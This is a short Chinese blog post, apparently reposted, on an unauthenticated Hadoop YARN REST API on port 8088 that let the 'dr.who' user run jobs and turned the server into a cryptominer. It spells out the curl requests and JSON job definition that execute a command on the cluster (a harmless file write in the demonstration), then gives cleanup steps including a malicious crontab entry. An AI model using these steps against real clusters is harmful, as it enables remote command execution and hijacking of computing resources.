Hadoop基础之《—yarn dr.who用户漏洞被挖矿》
Posted csj50
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Hadoop基础之《—yarn dr.who用户漏洞被挖矿》相关的知识,希望对你有一定的参考价值。
一、背景
dr.who用户执行了很多application,服务器被挖矿。因为yarn的8088端口REST API没有做权限控制,允许任意用户通过API创建任务
1、创建应用
curl -v -X POST 'http://192.168.1.1:8088/ws/v1/cluster/apps/new-application'2、构建json文件
"am-container-spec":
"commands":
"command": "echo '111' > /var/tmp/11112222_test_11112222"
,
"application-id": "application_1675146160084_0001",
"application-name": "test",
"application-type": "YARN"
3、提交任务
curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://192.168.1.1:8088/ws/v1/cluster/apps --data-binary @1.json4、查看执行情况
http://192.168.1.1:8088/cluster/app/application_1675146160084_0001
5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件
二、清理挖矿
1、检查/tmp和/var/tmp目录,删除异常文件
2、检查crontab -l,删除可疑脚本
4 * * * * /root/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &3、删除可疑进程
参考资料:
https://paper.seebug.org/611/
https://www.cnblogs.com/wshichang/p/14948393.html
以上是关于Hadoop基础之《—yarn dr.who用户漏洞被挖矿》的主要内容,如果未能解决你的问题,请参考以下文章
Permission denied: user=dr.who, access=WRITE, inode=“/output“:root:supergroup:drwxr-xr-x